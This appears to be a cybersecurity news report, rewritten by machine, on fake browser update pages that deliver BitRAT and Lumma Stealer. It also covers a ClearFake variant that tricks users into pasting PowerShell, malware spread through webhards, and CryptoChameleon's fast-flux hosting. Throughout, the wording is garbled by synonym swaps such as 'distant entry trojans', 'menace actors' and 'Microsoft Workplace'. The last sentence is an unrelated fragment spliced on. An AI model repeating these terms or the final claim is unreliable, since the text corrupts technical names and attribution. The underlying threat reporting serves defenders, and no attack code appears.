Pretend internet browser updates are getting used to ship distant entry trojans (RATs) and data stealer malware reminiscent of BitRAT and Lumma Stealer (aka LummaC2).
“Fake browser updates have been responsible for numerous malware infections, including those of the well-known SocGholish malware,” cybersecurity agency eSentire mentioned in a brand new report. “In April 2024, we noticed FakeBat being distributed by way of comparable pretend replace mechanisms.”
The assault chain commences when potential targets visits a booby-trapped web site that incorporates JavaScript code designed to redirect customers to a bogus browser replace web page (“chatgpt-app[.]cloud”).
The redirected internet web page comes embedded with a obtain hyperlink to a ZIP archive file (“Update.zip”) that is hosted on Discord and downloaded mechanically to the sufferer’s machine.
It is value stating that menace actors usually use Discord as an assault vector, with a current evaluation from Bitdefender uncovering greater than 50,000 harmful hyperlinks distributing malware, phishing campaigns, and spam over the previous six months.
Current throughout the ZIP archive file is one other JavaScript file (“Update.js”), which triggers the execution of PowerShell scripts chargeable for retrieving further payloads, together with BitRAT and Lumma Stealer, from a distant server within the type of PNG picture recordsdata.
Additionally retrieved on this method are PowerShell scripts to determine persistence and a .NET-based loader that is primarily used for launching the final-stage malware. eSentire postulated that the loader is probably going marketed as a “malware delivery service” owing to the truth that the identical loader is used to deploy each BitRAT and Lumma Stealer.
BitRAT is a feature-rich RAT that enables attackers to reap information, mine cryptocurrency, obtain extra binaries, and remotely commandeer the contaminated hosts. Lumma Stealer, a commodity stealer malware accessible for $250 to $1,000 per 30 days since August 2022, presents the flexibility to seize info from internet browsers, crypto wallets, and different delicate particulars.
“The fake browser update lure has become common amongst attackers as a means of entry to a device or network,” the corporate mentioned, including it “displays the operator’s ability to leverage trusted names to maximize reach and impact.”
Whereas such assaults usually leverage drive-by downloads and malvertising strategies, ReliaQuest, in a report printed final week, mentioned it found a brand new variant of the ClearFake marketing campaign that methods customers into copying, pasting, and manually executing malicious PowerShell code beneath the pretext of a browser replace.
Particularly, the malicious web site claims that “something went wrong while displaying this webpage” and instructs the positioning customer to put in a root certificates to deal with the problem by following a collection of steps, which entails copying obfuscated PowerShell code and working it in a PowerShell terminal.
“Upon execution, the PowerShell code performs multiple functions, including clearing the DNS cache, displaying a message box, downloading further PowerShell code, and installing ‘LummaC2’ malware,” the corporate mentioned.
In response to info shared by the cybersecurity agency, Lumma Stealer emerged as one of the vital prevalent info stealers in 2023, alongside RedLine and Raccoon.
“The number of LummaC2-obtained logs listed for sale increased by 110% from Q3 to Q4 2023,” it famous. “LummaC2’s rising popularity among adversaries is likely due to its high success rate, which refers to its effectiveness in successfully infiltrating systems and exfiltrating sensitive data without detection.”
The event comes because the AhnLab Safety Intelligence Middle (ASEC) disclosed particulars of a brand new marketing campaign that employs webhards (quick for internet onerous drive) as a conduit to distribute malicious installers for grownup video games and cracked variations of Microsoft Workplace and finally deploy a wide range of malware reminiscent of Orcus RAT, XMRig miner, 3proxy, and XWorm.
Comparable assault chains involving web sites providing pirated software program have led to the deployment of malware loaders like PrivateLoader and TaskLoader, that are each supplied as a pay-per-install (PPI) service for different cybercriminals to ship their very own payloads.
It additionally follows new findings from Silent Push about CryptoChameleon‘s “almost exclusive use” of DNSPod[.]com nameservers to assist its phishing package structure. DNSPod, a part of the Chinese language firm Tencent, has a historical past of offering providers for malicious bulletproof internet hosting operators.
“CryptoChameleon uses DNSPod nameservers to engage in fast flux evasion techniques that allow threat actors to quickly cycle through large amounts of IPs linked to a single domain name,” the corporate mentioned.
“Fast flux allows CryptoChameleon infrastructure to evade traditional countermeasures, and significantly reduces the operational value of legacy point-in-time IOCs.” utilizing at the very least seven major social media accounts and a CIB community of greater than 250 accounts.
